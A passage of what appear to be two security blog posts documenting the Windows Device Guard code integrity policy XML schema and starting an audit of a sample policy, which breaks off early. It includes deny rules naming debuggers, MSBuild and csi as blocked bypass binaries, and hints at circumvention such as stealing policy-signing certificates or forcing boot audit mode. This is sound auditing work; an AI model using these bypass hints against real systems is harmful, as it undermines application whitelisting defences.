      <Option>Enabled:UMCI</Option>

    </Rule>

  </Rules>

  <!--EKUS-->

  <EKUs />

  <!--File Rules-->

  <FileRules>

    <FileAttrib ID="ID_FILEATTRIB_F_1" FriendlyName="C:\Program Files\Windows Kits\10\Debuggers\x64\cdb.exe FileAttribute" FileName="CDB.Exe" MinimumFileVersion="65535.65535.65535.65535" />

    <FileAttrib ID="ID_FILEATTRIB_F_2" FriendlyName="C:\Program Files\Windows Kits\10\Debuggers\x64\kd.exe FileAttribute" FileName="kd.exe" MinimumFileVersion="65535.65535.65535.65535" />

    <FileAttrib ID="ID_FILEATTRIB_F_3" FriendlyName="C:\Program Files\Windows Kits\10\Debuggers\x64\windbg.exe FileAttribute" FileName="windbg.exe" MinimumFileVersion="65535.65535.65535.65535" />

  </FileRules>

  <!--Signers-->

  <Signers>

    <Signer ID="ID_SIGNER_F_1" Name="Microsoft Code Signing PCA">

      <CertRoot Type="TBS" Value="27543A3F7612DE2261C7228321722402F63A07DE" />

      <CertPublisher Value="Microsoft Corporation" />

      <FileAttribRef RuleID="ID_FILEATTRIB_F_1" />

      <FileAttribRef RuleID="ID_FILEATTRIB_F_2" />

      <FileAttribRef RuleID="ID_FILEATTRIB_F_3" />

    </Signer>

    <Signer ID="ID_SIGNER_F_2" Name="Microsoft Code Signing PCA 2010">

      <CertRoot Type="TBS" Value="121AF4B922A74247EA49DF50DE37609CC1451A1FE06B2CB7E1E079B492BD8195" />

      <CertPublisher Value="Microsoft Corporation" />

      <FileAttribRef RuleID="ID_FILEATTRIB_F_1" />

      <FileAttribRef RuleID="ID_FILEATTRIB_F_2" />

      <FileAttribRef RuleID="ID_FILEATTRIB_F_3" />

    </Signer>

  </Signers>

  <!--Driver Signing Scenarios-->

  <SigningScenarios>

    <SigningScenario Value="131" ID="ID_SIGNINGSCENARIO_DRIVERS_1" FriendlyName="Auto generated policy on 09-07-2016">

      <ProductSigners />

    </SigningScenario>

    <SigningScenario Value="12" ID="ID_SIGNINGSCENARIO_WINDOWS" FriendlyName="Auto generated policy on 09-07-2016">

      <ProductSigners>

        <DeniedSigners>

          <DeniedSigner SignerId="ID_SIGNER_F_1" />

          <DeniedSigner SignerId="ID_SIGNER_F_2" />

        </DeniedSigners>

      </ProductSigners>

    </SigningScenario>

  </SigningScenarios>

  <UpdatePolicySigners />

  <CiSigners>

    <CiSigner SignerId="ID_SIGNER_F_1" />

    <CiSigner SignerId="ID_SIGNER_F_2" />

  </CiSigners>

  <HvciOptions>0</HvciOptions>

</SiPolicy>

Windows Device Guard Code Integrity Policy Reference

27 October 2016 at 15:50
One of the more obvious ways to circumvent Device Guard deployments is by exploiting code integrity policy misconfigurations. The ability to effectively audit deployed policies requires a thorough comprehension of the XML schema used by Device Guard. This post is intended to serve as documentation of the XML elements of a Device Guard code integrity policy with a focus on auditing from the perspective of a pentester. And do note that the schema used by Microsoft is not publicly documented and subject to change in future versions. If things change, expect an update from me.
As a reminder, deployed code integrity policies are stored in %SystemRoot%\System32\CodeIntegrity\SIPolicy.p7b in binary form. If you're lucky enough to track down the original XML code integrity policy, you can validate that it matches the deployed SIPolicy.p7b by converting it to binary form with ConvertFrom-CIPolicy and then comparing the hashes with Get-FileHash. If you are unable to locate the original XML policy, you can recover an XML policy with the ConvertTo-CIPolicy function I wrote. Note, however, that ConvertTo-CIPolicy cannot recover all element ID and FriendlyName attributes, as conversion to binary form is unfortunately lossy.
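A minimal sketch of that validation (paths are illustrative):

# Convert the candidate XML policy to binary form and compare its hash against the deployed policy.
ConvertFrom-CIPolicy -XmlFilePath .\CandidatePolicy.xml -BinaryFilePath .\CandidatePolicy.bin
$DeployedHash = Get-FileHash -Path "$env:SystemRoot\System32\CodeIntegrity\SIPolicy.p7b"
$CandidateHash = Get-FileHash -Path .\CandidatePolicy.bin
# $True indicates the XML policy you located matches what is actually deployed.
$DeployedHash.Hash -eq $CandidateHash.Hash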
For reference, here are some code integrity policies that I personally use. Obviously, yours will be different in your environment.
Policies are generated initially using the New-CiPolicy cmdlet.
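For example, an initial scan might look like the following (parameters are illustrative, not a recommendation):

# Scan the system volume and generate PCA certificate-level rules covering user-mode code.
New-CIPolicy -FilePath .\InitialPolicy.xml -Level PcaCertificate -UserPEs -ScanPath C:\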
The current (but subject to change) code integrity schema can be found here. This was pulled out from an embedded resource in the ConfigCI cmdlets - Microsoft.ConfigCI.Commands.dll.
What will follow is a detailed breakdown of most code integrity policy XML elements that you may encounter while auditing Device Guard deployments. Hopefully, at some point in the future, Microsoft will provide such documentation. In the meantime, I hope this is helpful! In a future post, I will conduct an actual code integrity policy audit and identify potential vulnerabilities that would allow for unsigned code execution.

VersionEx
Default value: 10.0.0.0
Purpose: An admin can set this to perform versioning of updated CI policies. This is what I do in BypassDenyPolicy.xml. VersionEx can be set programmatically with Set-CIPolicyVersion.

PolicyTypeID

Default value: {A244370E-44C9-4C06-B551-F6016E563076}
Purpose: Unknown. This value is automatically generated upon calling New-CIPolicy. Unless Microsoft decides to change things, this value should always remain the same.

PlatformID
Default value: {2E07F7E4-194C-4D20-B7C9-6F44A6C5A234}
Purpose: Unknown. This value is automatically generated upon calling New-CIPolicy. Unless Microsoft decides to change things, this value should always remain the same.

Rules

The Rules element consists of multiple child Rule elements. A Rule element refers to a specific policy rule option - i.e. a specific configuration of Device Guard. Some, but not all, of these options are documented. Policy rule options are configured with the Set-RuleOption cmdlet.

Documented and/or publicly exposed policy rules

1) Enabled:UMCI
Description: Enforces user-mode code integrity for user mode binaries, PowerShell scripts, WSH scripts, and MSIs. The absence of this policy rule implies that whitelist/blacklist rules will only apply to drivers.
Operational impact: User mode binaries and MSIs not explicitly whitelisted will not execute. PowerShell will be placed into ConstrainedLanguage mode. Whitelisted, signed scripts have no restrictions and run in FullLanguage mode. WSH scripts (VBScript and JScript) not whitelisted per policy are unable to instantiate COM/ActiveX objects. Signed scripts whitelisted by policy have no such restrictions.
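A quick way to observe the PowerShell impact of this rule from an interactive session:

# Under UMCI, a session running non-whitelisted code reports ConstrainedLanguage;
# otherwise, FullLanguage.
$ExecutionContext.SessionState.LanguageMode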
2) Required:WHQL
Description: Drivers must be Windows Hardware Quality Labs (WHQL) signed. Drivers signed with a WHQL certificate are indicated by a "Windows Hardware Driver Verification" EKU (1.3.6.1.4.1.311.10.3.5) in their certificate.
Operational impact: This will raise the bar on the quality (and arguably the trustworthiness) of the drivers that will be allowed to execute.
3) Disabled:Flight Signing
Description: Disable loading of flight signed code. These are used most commonly with Insider Preview builds of Windows. A flight signed binary/script is one that is signed by a Microsoft certificate and has the "Preview Build Signing" EKU (1.3.6.1.4.1.311.10.3.27) applied. Thanks to Alex Ionescu for confirming this.
Operational Impact: Preview build binaries/scripts will not be allowed to load. In other words, if you're on a WIP build, don't expect your OS to function properly.
4) Enabled:Unsigned System Integrity Policy
Description: If present, the code integrity policy does not have to be signed with a code signing certificate. The absence of this rule option indicates that the code integrity policy must be signed by a whitelisted signer as indicated in the UpdatePolicySigners section below.
Operational Impact: Once signed, deployed code integrity options can only be updated by signing a new policy with a whitelisted certificate. Even an admin cannot remove deployed, signed code integrity policies. If modifying and redeploying a signed code integrity policy is your goal, you will need to steal one of the whitelisted UpdatePolicySigners code signing certificates.
5) Required:EV Signers
Description: All drivers must be EV (extended validation) signed.
Operational Impact: This will likely not be present as most 3rd party and OEM drivers are not EV signed. Supposedly, Microsoft is mandating that all drivers be EV signed starting with Windows 10 Anniversary Update. From my observation, this does not appear to be the case.
6) Enabled:Advanced Boot Options Menu
Description: By default, with a code integrity policy deployed, the advanced boot options menu is disabled.
Operational Impact: With this option present, the menu is available to someone with physical access. There are additional concerns associated with physical access to a Device Guard enabled system. Such concerns may be covered in a future blog post.
7) Enabled:Boot Audit On Failure
Description: If a driver fails to load during the boot process due to an overly restrictive code integrity policy, the system will be placed into audit mode for that session.
Operational Impact: If you could somehow get a driver to fail to load during the boot process, Device Guard would cease to be enforced.
8) Disabled:Script Enforcement
Description: This is not actually documented but listed with 'Set-RuleOption -Help'. You would think that this actually does what it says but in practice it doesn't. Even with this set, PowerShell and WSH remain locked down.
Operational Impact: None. It is unlikely that you would see this in production anyway.

Undocumented and/or not publicly exposed policy rules

The following policy rule options are undocumented and it is unclear if they are supported or not. As of this writing, you will likely never see these options in a deployed policy.
  • Enabled:Boot Menu Protection
  • Enabled:Inherit Default Policy
  • Allowed:Prerelease Signers
  • Allowed:Kits Signers
  • Allowed:Debug Policy Augmented
  • Allowed:UMCI Debug Options
  • Enabled:UMCI Cache Data Volumes
  • Allowed:SeQuerySigningPolicy Extension
  • Enabled:Filter Edited Boot Options
  • Disabled:UMCI USN 0 Protection
  • Disabled:Winload Debugging Mode Menu
  • Enabled:Strong Crypto For Code Integrity
  • Allowed:Non-Microsoft UEFI Applications For BitLocker
  • Enabled:Always Use Policy
  • Enabled:UMCI Trust USN 0
  • Disabled:UMCI Debug Options TCB Lowering
  • Enabled:Secure Setting Policy


EKUs
This can consist of a list of Extended/Enhanced Key Usages (EKUs) that can be applied to signers. When applied to a signer rule, the specified EKU must be present in the certificate used to sign the binary/script.
EKU instances have a "Value" attribute consisting of an encoded OID. For example, if you want to enforce WHQL signing, the "Windows Hardware Driver Verification" EKU (1.3.6.1.4.1.311.10.3.5) would need to be applied to those drivers. When encoded the "Value" attribute would be "010A2B0601040182370A0305" (where the first byte which would normally be 0x06 (absolute OID) is replaced with 0x01). The OID encoding process is described here. ConvertTo-CIPolicy decodes and resolves the original FriendlyName attribute for encoded OID values.

FileRules
These are rules specific to individual files, based either on their hash or on their filename and file version (both taken from the file's embedded PE version resource, not from the name on disk). FileRules can consist of the following types: FileAttrib, Allow, Deny. File rules can apply to specific signers or signing scenarios.
FileAttrib
These are used to reflect a user or kernel PE filename and minimum file version number. These can be used to either explicitly allow or block binaries based on filename and version.
Allow
These typically consist of just a file hash and are used to override an explicit deny rule. In practice, it is unlikely that you will see an Allow file rule.
Deny
These typically consist of just a file hash and are used to override whitelist rules when you want to block trusted code by hash.
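For illustration, hash-based Allow and Deny rules take the following form (the ID, FriendlyName, and Hash values below are fabricated placeholders):

<Allow ID="ID_ALLOW_A_1" FriendlyName="Example allow rule" Hash="0011AABB..." />
<Deny ID="ID_DENY_D_1" FriendlyName="Example deny rule" Hash="CCDDEEFF..." />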

Signers
This section consists of all of the signing certificates that will be applied to rules in the signing scenario section. Each signer entry is required to have a CertRoot property where the Value attribute refers to the hash of the cbData blob of the certificate. The hashing algorithm used is dependent upon the hashing algorithm specified in the certificate. This hash serves as the unique identifier for the certificate. The CertRoot "Type" attribute will almost always be "TBS" (to be signed). The "WellKnown" type is also possible but will not be common.
The signer element can have any of the following optional child elements:
CertEKU
One or more EKUs from the EKU element described above can be applied here. Ultimately, this would constrain a whitelist rule to code signed with certificates with specific EKUs, "Windows Hardware Driver Verification" (WHQL) probably being the most common.
CertIssuer
I have personally not seen this in practice but this will likely contain the common name (CN) of the issuing certificate.
CertPublisher
This refers to the common name (CN) of the certificate. This element is associated with the "Publisher" file rule level.
CertOemID
This is often associated with driver signers. This will often have a third party vendor name associated with a driver signed with a "Microsoft Windows Third Party Component CA" certificate. If CertOemIDs were not specified for the "Microsoft Windows Third Party Component CA" signer, then you would implicitly be whitelisting all 3rd party drivers signed by Microsoft.
FileAttribRef
There may be one or more references to FileAttrib rules where the signer rules apply only to the files referenced.

SigningScenarios
When auditing code integrity policies, this is where you will want to start and then work backwards. It contains all the enforcement rules for drivers and user mode code. Signing scenarios consist of a combination of the individual elements discussed previously. There will almost always be two SigningScenario elements present:
  1. <SigningScenario Value="131" ID="ID_SIGNINGSCENARIO_DRIVERS_1"> - This scenario will consist of zero or more rules related to driver loading.
  2. <SigningScenario Value="12" ID="ID_SIGNINGSCENARIO_WINDOWS"> - This scenario will consist of zero or more rules related to user mode binaries, scripts, and MSIs.

Each signing scenario can have up to three subelements:
  1. ProductSigners - This will comprise all of the code integrity rules for drivers or user mode code depending upon the signing scenario.
  2. TestSigners - You will likely never encounter this. The purpose of this signers group is unclear.
  3. TestSigningSigners - You will likely never encounter this. The purpose of this signers group is unclear.

Each signers group (ProductSigners, TestSigners, or TestSigningSigners) may consist of any of the following subelements:
Allowed signers
These are the whitelisted signer rules. These will consist of one or more signer rules and optionally, one or more ExceptDenyRules which link to specific file rules making the signer rule conditional. In practice, ExceptDenyRules will likely not be present.
Denied signers
These are the blacklisted signer rules. These rules will always take priority over allow rules. These will consist of one or more signer rules and optionally, one or more ExceptAllowRules which link to specific file rules making the signer rule conditional. In practice, ExceptAllowRules will likely not be present.
FileRulesRef
These will consist of individual file allow or deny rules. For example, if there are individual files to be blocked by hash, such rules will be included here.

UpdatePolicySigners
If policy signing is required as indicated by the absence of the "Enabled:Unsigned System Integrity Policy" policy rule option, a deployed policy must be signed by the signers indicated here. The only way to modify a deployed policy in this case would be to resign the policy with one of these certificates. UpdatePolicySigners is updated using the Add-SignerRule cmdlet.
If a binary policy (SIPolicy.p7b) is signed, you can validate signature with Get-CIBinaryPolicyCertificate.

CISigners
These will consist of mirrored signing rules from the ID_SIGNINGSCENARIO_WINDOWS signing scenario. These are related to the trusting of signers and signing levels by the kernel. These are auto-generated and not configurable via the ConfigCI PowerShell module. These entries should not be modified.

HvciOptions
This specifies the configured hypervisor code integrity (HVCI) option. HVCI implements several kernel exploitation mitigations including W^X kernel memory and restricts the ability to allocate any executable memory for code that isn't explicitly whitelisted. Basically, HVCI allows for the system to continue to enforce code integrity even if the kernel is compromised. HVCI settings are configured using the Set-HVCIOptions cmdlet.
Any combination of the following values is accepted:
0 - Not configured
1 - Enabled
2 - Strict mode
4 - Debug mode
HVCI is not well documented as of this writing. Outside of Microsoft, Alex Ionescu and Rafal Wojtczuk are experts on this subject.

Settings
Settings may consist of one or more provider/value pairs. These options are referred to internally as "Secure Settings". The range of possible values that can be set here is unclear. The only entry you might see would be a PolicyInfo provider setting where a user can specify an explicit Name and Id for the code integrity policy, which would be reflected in Microsoft-Windows-CodeIntegrity/Operational events. PolicyInfo settings can be set with the Set-CIPolicyIdInfo cmdlet.
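A sketch of setting those values (the name and ID are illustrative):

# Stamp a friendly name and ID that will be reflected in CodeIntegrity event log entries.
Set-CIPolicyIdInfo -FilePath .\MergedAuditPolicy.xml -PolicyName 'SurfacePolicy' -PolicyId '1.0'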

Device Guard Code Integrity Policy Auditing Methodology

21 November 2016 at 13:57
In my previous blog post, I provided a detailed reference of every component of a code integrity (CI) policy. In this post, I'd like to exercise that reference and perform an audit of a code integrity policy. We're going to analyze a policy that I had previously deployed to my Surface Pro 4 - final.xml.

<?xml version="1.0" encoding="utf-8"?>

<SiPolicy xmlns="urn:schemas-microsoft-com:sipolicy">

  <VersionEx>10.0.0.0</VersionEx>

  <PolicyTypeID>{A244370E-44C9-4C06-B551-F6016E563076}</PolicyTypeID>

  <PlatformID>{2E07F7E4-194C-4D20-B7C9-6F44A6C5A234}</PlatformID>

  <Rules>

    <Rule>

      <Option>Required:Enforce Store Applications</Option>

    </Rule>

    <Rule>

      <Option>Enabled:UMCI</Option>

    </Rule>

    <Rule>

      <Option>Disabled:Flight Signing</Option>

    </Rule>

    <Rule>

      <Option>Required:WHQL</Option>

    </Rule>

    <Rule>

      <Option>Enabled:Unsigned System Integrity Policy</Option>

    </Rule>

    <Rule>

      <Option>Enabled:Advanced Boot Options Menu</Option>

    </Rule>

  </Rules>

  <!--EKUS-->

  <EKUs />

  <!--File Rules-->

  <FileRules>

    <FileAttrib ID="ID_FILEATTRIB_F_1_0_0_1_0_0" FriendlyName="cdb.exe" FileName="CDB.Exe" MinimumFileVersion="99.0.0.0" />

    <FileAttrib ID="ID_FILEATTRIB_F_2_0_0_1_0_0" FriendlyName="kd.exe" FileName="kd.exe" MinimumFileVersion="99.0.0.0" />

    <FileAttrib ID="ID_FILEATTRIB_F_3_0_0_1_0_0" FriendlyName="windbg.exe" FileName="windbg.exe" MinimumFileVersion="99.0.0.0" />

    <FileAttrib ID="ID_FILEATTRIB_F_4_0_0_1_0_0" FriendlyName="MSBuild.exe" FileName="MSBuild.exe" MinimumFileVersion="99.0.0.0" />

    <FileAttrib ID="ID_FILEATTRIB_F_5_0_0_1_0_0" FriendlyName="csi.exe" FileName="csi.exe" MinimumFileVersion="99.0.0.0" />

  </FileRules>

  <!--Signers-->

  <Signers>

    <Signer ID="ID_SIGNER_S_1_0_0_0_0_0_0_0" Name="Microsoft Windows Production PCA 2011">

      <CertRoot Type="TBS" Value="4E80BE107C860DE896384B3EFF50504DC2D76AC7151DF3102A4450637A032146" />

    </Signer>

    <Signer ID="ID_SIGNER_S_AE_0_0_0_0_0_0_0" Name="Intel External Basic Policy CA">

      <CertRoot Type="TBS" Value="53B052BA209C525233293274854B264BC0F68B73" />

    </Signer>

    <Signer ID="ID_SIGNER_S_AF_0_0_0_0_0_0_0" Name="Microsoft Windows Third Party Component CA 2012">

      <CertRoot Type="TBS" Value="CEC1AFD0E310C55C1DCC601AB8E172917706AA32FB5EAF826813547FDF02DD46" />

    </Signer>

    <Signer ID="ID_SIGNER_S_17C_0_0_0_0_0_0_0" Name="COMODO RSA Certification Authority">

      <CertRoot Type="TBS" Value="7CE102D63C57CB48F80A65D1A5E9B350A7A618482AA5A36775323CA933DDFCB00DEF83796A6340DEC5EBF7596CFD8E5D" />

    </Signer>

    <Signer ID="ID_SIGNER_S_18D_0_0_0_0_0_0_0" Name="Microsoft Code Signing PCA 2010">

      <CertRoot Type="TBS" Value="121AF4B922A74247EA49DF50DE37609CC1451A1FE06B2CB7E1E079B492BD8195" />

    </Signer>

    <Signer ID="ID_SIGNER_S_2E0_0_0_0_0_0_0_0" Name="VeriSign Class 3 Code Signing 2010 CA">

      <CertRoot Type="TBS" Value="4843A82ED3B1F2BFBEE9671960E1940C942F688D" />

    </Signer>

    <Signer ID="ID_SIGNER_S_34C_0_0_0_0_0_0_0" Name="Microsoft Code Signing PCA">

      <CertRoot Type="TBS" Value="27543A3F7612DE2261C7228321722402F63A07DE" />

    </Signer>

    <Signer ID="ID_SIGNER_S_34F_0_0_0_0_0_0_0" Name="Microsoft Code Signing PCA 2011">

      <CertRoot Type="TBS" Value="F6F717A43AD9ABDDC8CEFDDE1C505462535E7D1307E630F9544A2D14FE8BF26E" />

    </Signer>

    <Signer ID="ID_SIGNER_S_37B_0_0_0_0_0_0_0" Name="Microsoft Root Certificate Authority">

      <CertRoot Type="TBS" Value="391BE92883D52509155BFEAE27B9BD340170B76B" />

    </Signer>

    <Signer ID="ID_SIGNER_S_485_0_0_0_0_0_0_0" Name="Microsoft Windows Verification PCA">

      <CertRoot Type="TBS" Value="265E5C02BDC19AA5394C2C3041FC2BD59774F918" />

    </Signer>

    <Signer ID="ID_SIGNER_S_1_1_0_0_0_0_0_0" Name="Microsoft Windows Production PCA 2011">

      <CertRoot Type="TBS" Value="4E80BE107C860DE896384B3EFF50504DC2D76AC7151DF3102A4450637A032146" />

    </Signer>

    <Signer ID="ID_SIGNER_S_35C_1_0_0_0_0_0_0" Name="Microsoft Code Signing PCA">

      <CertRoot Type="TBS" Value="27543A3F7612DE2261C7228321722402F63A07DE" />

    </Signer>

    <Signer ID="ID_SIGNER_S_35F_1_0_0_0_0_0_0" Name="Microsoft Code Signing PCA 2011">

      <CertRoot Type="TBS" Value="F6F717A43AD9ABDDC8CEFDDE1C505462535E7D1307E630F9544A2D14FE8BF26E" />

    </Signer>

    <Signer ID="ID_SIGNER_S_1EA5_1_0_0_0_0_0_0" Name="Microsoft Code Signing PCA 2010">

      <CertRoot Type="TBS" Value="121AF4B922A74247EA49DF50DE37609CC1451A1FE06B2CB7E1E079B492BD8195" />

    </Signer>

    <Signer ID="ID_SIGNER_S_2316_1_0_0_0_0_0_0" Name="Microsoft Windows Verification PCA">

      <CertRoot Type="TBS" Value="265E5C02BDC19AA5394C2C3041FC2BD59774F918" />

    </Signer>

    <Signer ID="ID_SIGNER_S_3D8C_1_0_0_0_0_0_0" Name="Microsoft Code Signing PCA">

      <CertRoot Type="TBS" Value="7251ADC0F732CF409EE462E335BB99544F2DD40F" />

    </Signer>

    <Signer ID="ID_SIGNER_S_4_1_0_0_0" Name="Matthew Graeber">

      <CertRoot Type="TBS" Value="B1554C5EEF15063880BB76B347F2215CDB5BBEFA1A0EBD8D8F216B6B93E8906A" />

    </Signer>

    <Signer ID="ID_SIGNER_S_1_1_0" Name="Intel External Basic Policy CA">

      <CertRoot Type="TBS" Value="53B052BA209C525233293274854B264BC0F68B73" />

      <CertPublisher Value="Intel(R) Intel_ICG" />

    </Signer>

    <Signer ID="ID_SIGNER_S_2_1_0" Name="Microsoft Windows Third Party Component CA 2012">

      <CertRoot Type="TBS" Value="CEC1AFD0E310C55C1DCC601AB8E172917706AA32FB5EAF826813547FDF02DD46" />

      <CertPublisher Value="Microsoft Windows Hardware Compatibility Publisher" />

    </Signer>

    <Signer ID="ID_SIGNER_S_19_1_0" Name="Intel External Basic Policy CA">

      <CertRoot Type="TBS" Value="53B052BA209C525233293274854B264BC0F68B73" />

      <CertPublisher Value="Intel(R) pGFX" />

    </Signer>

    <Signer ID="ID_SIGNER_S_20_1_0" Name="iKGF_AZSKGFDCS">

      <CertRoot Type="TBS" Value="32656594870EFFE75251652A99B906EDB92D6BB0" />

      <CertPublisher Value="IntelVPGSigning2016" />

    </Signer>

    <Signer ID="ID_SIGNER_S_4E_1_0" Name="Microsoft Windows Third Party Component CA 2012">

      <CertRoot Type="TBS" Value="CEC1AFD0E310C55C1DCC601AB8E172917706AA32FB5EAF826813547FDF02DD46" />

    </Signer>

    <Signer ID="ID_SIGNER_S_65_1_0" Name="VeriSign Class 3 Code Signing 2010 CA">

      <CertRoot Type="TBS" Value="4843A82ED3B1F2BFBEE9671960E1940C942F688D" />

      <CertPublisher Value="Logitech" />

    </Signer>

    <Signer ID="ID_SIGNER_S_5_1_0_0_0" Name="Matthew Graeber">

      <CertRoot Type="TBS" Value="B1554C5EEF15063880BB76B347F2215CDB5BBEFA1A0EBD8D8F216B6B93E8906A" />

    </Signer>

    <Signer ID="ID_SIGNER_F_1_0_0_1_0_0" Name="Microsoft Code Signing PCA">

      <CertRoot Type="TBS" Value="27543A3F7612DE2261C7228321722402F63A07DE" />

      <CertPublisher Value="Microsoft Corporation" />

      <FileAttribRef RuleID="ID_FILEATTRIB_F_1_0_0_1_0_0" />

      <FileAttribRef RuleID="ID_FILEATTRIB_F_2_0_0_1_0_0" />

      <FileAttribRef RuleID="ID_FILEATTRIB_F_3_0_0_1_0_0" />

      <FileAttribRef RuleID="ID_FILEATTRIB_F_4_0_0_1_0_0" />

    </Signer>

    <Signer ID="ID_SIGNER_F_2_0_0_1_0_0" Name="Microsoft Code Signing PCA 2010">

      <CertRoot Type="TBS" Value="121AF4B922A74247EA49DF50DE37609CC1451A1FE06B2CB7E1E079B492BD8195" />

      <CertPublisher Value="Microsoft Corporation" />

      <FileAttribRef RuleID="ID_FILEATTRIB_F_1_0_0_1_0_0" />

      <FileAttribRef RuleID="ID_FILEATTRIB_F_2_0_0_1_0_0" />

      <FileAttribRef RuleID="ID_FILEATTRIB_F_3_0_0_1_0_0" />

    </Signer>

    <Signer ID="ID_SIGNER_F_3_0_0_1_0_0" Name="Microsoft Code Signing PCA 2011">

      <CertRoot Type="TBS" Value="F6F717A43AD9ABDDC8CEFDDE1C505462535E7D1307E630F9544A2D14FE8BF26E" />

      <CertPublisher Value="Microsoft Corporation" />

      <FileAttribRef RuleID="ID_FILEATTRIB_F_4_0_0_1_0_0" />

      <FileAttribRef RuleID="ID_FILEATTRIB_F_5_0_0_1_0_0" />

    </Signer>

    <Signer ID="ID_SIGNER_F_4_0_0_1_0_0" Name="Microsoft Windows Production PCA 2011">

      <CertRoot Type="TBS" Value="4E80BE107C860DE896384B3EFF50504DC2D76AC7151DF3102A4450637A032146" />

      <CertPublisher Value="Microsoft Windows" />

      <FileAttribRef RuleID="ID_FILEATTRIB_F_4_0_0_1_0_0" />

    </Signer>

  </Signers>

  <!--Driver Signing Scenarios-->

  <SigningScenarios>

    <SigningScenario Value="131" ID="ID_SIGNINGSCENARIO_DRIVERS_1" FriendlyName="Kernel-mode rules">

      <ProductSigners>

        <AllowedSigners>

          <AllowedSigner SignerId="ID_SIGNER_S_1_0_0_0_0_0_0_0" />

          <AllowedSigner SignerId="ID_SIGNER_S_AE_0_0_0_0_0_0_0" />

          <AllowedSigner SignerId="ID_SIGNER_S_AF_0_0_0_0_0_0_0" />

          <AllowedSigner SignerId="ID_SIGNER_S_17C_0_0_0_0_0_0_0" />

          <AllowedSigner SignerId="ID_SIGNER_S_18D_0_0_0_0_0_0_0" />

          <AllowedSigner SignerId="ID_SIGNER_S_2E0_0_0_0_0_0_0_0" />

          <AllowedSigner SignerId="ID_SIGNER_S_34C_0_0_0_0_0_0_0" />

          <AllowedSigner SignerId="ID_SIGNER_S_34F_0_0_0_0_0_0_0" />

          <AllowedSigner SignerId="ID_SIGNER_S_37B_0_0_0_0_0_0_0" />

          <AllowedSigner SignerId="ID_SIGNER_S_485_0_0_0_0_0_0_0" />

        </AllowedSigners>

      </ProductSigners>

    </SigningScenario>

    <SigningScenario Value="12" ID="ID_SIGNINGSCENARIO_WINDOWS" FriendlyName="User-mode rules">

      <ProductSigners>

        <AllowedSigners>

          <AllowedSigner SignerId="ID_SIGNER_S_1_1_0_0_0_0_0_0" />

          <AllowedSigner SignerId="ID_SIGNER_S_1_1_0" />

          <AllowedSigner SignerId="ID_SIGNER_S_2_1_0" />

          <AllowedSigner SignerId="ID_SIGNER_S_4_1_0_0_0" />

          <AllowedSigner SignerId="ID_SIGNER_S_19_1_0" />

          <AllowedSigner SignerId="ID_SIGNER_S_20_1_0" />

          <AllowedSigner SignerId="ID_SIGNER_S_4E_1_0" />

          <AllowedSigner SignerId="ID_SIGNER_S_65_1_0" />

          <AllowedSigner SignerId="ID_SIGNER_S_35C_1_0_0_0_0_0_0" />

          <AllowedSigner SignerId="ID_SIGNER_S_35F_1_0_0_0_0_0_0" />

          <AllowedSigner SignerId="ID_SIGNER_S_1EA5_1_0_0_0_0_0_0" />

          <AllowedSigner SignerId="ID_SIGNER_S_2316_1_0_0_0_0_0_0" />

          <AllowedSigner SignerId="ID_SIGNER_S_3D8C_1_0_0_0_0_0_0" />

        </AllowedSigners>

        <DeniedSigners>

          <DeniedSigner SignerId="ID_SIGNER_F_1_0_0_1_0_0" />

          <DeniedSigner SignerId="ID_SIGNER_F_2_0_0_1_0_0" />

          <DeniedSigner SignerId="ID_SIGNER_F_3_0_0_1_0_0" />

          <DeniedSigner SignerId="ID_SIGNER_F_4_0_0_1_0_0" />

        </DeniedSigners>

      </ProductSigners>

    </SigningScenario>

  </SigningScenarios>

  <UpdatePolicySigners>

    <UpdatePolicySigner SignerId="ID_SIGNER_S_5_1_0_0_0" />

  </UpdatePolicySigners>

  <CiSigners>

    <CiSigner SignerId="ID_SIGNER_F_1_0_0_1_0_0" />

    <CiSigner SignerId="ID_SIGNER_F_2_0_0_1_0_0" />

    <CiSigner SignerId="ID_SIGNER_F_3_0_0_1_0_0" />

    <CiSigner SignerId="ID_SIGNER_F_4_0_0_1_0_0" />

    <CiSigner SignerId="ID_SIGNER_S_1_1_0" />

    <CiSigner SignerId="ID_SIGNER_S_1_1_0_0_0_0_0_0" />

    <CiSigner SignerId="ID_SIGNER_S_2_1_0" />

    <CiSigner SignerId="ID_SIGNER_S_4_1_0_0_0" />

    <CiSigner SignerId="ID_SIGNER_S_19_1_0" />

    <CiSigner SignerId="ID_SIGNER_S_20_1_0" />

    <CiSigner SignerId="ID_SIGNER_S_4E_1_0" />

    <CiSigner SignerId="ID_SIGNER_S_65_1_0" />

    <CiSigner SignerId="ID_SIGNER_S_35C_1_0_0_0_0_0_0" />

    <CiSigner SignerId="ID_SIGNER_S_35F_1_0_0_0_0_0_0" />

    <CiSigner SignerId="ID_SIGNER_S_1EA5_1_0_0_0_0_0_0" />

    <CiSigner SignerId="ID_SIGNER_S_2316_1_0_0_0_0_0_0" />

    <CiSigner SignerId="ID_SIGNER_S_3D8C_1_0_0_0_0_0_0" />

  </CiSigners>

  <HvciOptions>1</HvciOptions>

</SiPolicy>


A code integrity policy is only as good as the way in which it was configured. The only way to verify its effectiveness is with a thorough understanding of the policy schema and the intended deployment scenario of the policy all through the lens of an attacker. The analysis that I present, while subjective, will be thorough and well thought out based on the information I've learned about code integrity policy enforcement. The extent of my knowledge is driven by my experience with Device Guard thus far, Microsoft's public documentation, the talks I've had with the Device Guard team, and what I've reversed engineered.

Hopefully, you'll have the luxury of being able to analyze an original CI policy containing all comments and attributes. In some situations, you may not be so lucky and may be forced to obtain an XML policy from a deployed binary policy - SIPolicy.p7b. Comments and some attributes are stripped from binary policies. CI policy XML can be recovered with ConvertTo-CIPolicy.
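
A sketch of the recovery step (ConvertTo-CIPolicy is my own function, so treat the parameter names shown here as assumptions and check its help):

# Recover an editable XML policy from the deployed binary policy.
ConvertTo-CIPolicy -BinaryFilePath "$env:SystemRoot\System32\CodeIntegrity\SIPolicy.p7b" -XmlFilePath .\RecoveredPolicy.xml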

Alright. Let's dive into the analysis now. When I audit a code integrity policy, I will start in the following order:
  1. Policy rule analysis
  2. SigningScenario analysis. Signing scenario rules are ultimately generated based on a combination of one or more file rule levels.
  3. UpdatePolicySigner analysis
  4. HvciOptions analysis

Policy Rule Analysis
Policy rules dictate the overall configuration of Device Guard. What will follow is a description of each rule and its implications.

1) Required:Enforce Store Applications

Description: The presence of this setting indicates that code integrity will also be applied to Windows Store/UWP apps.

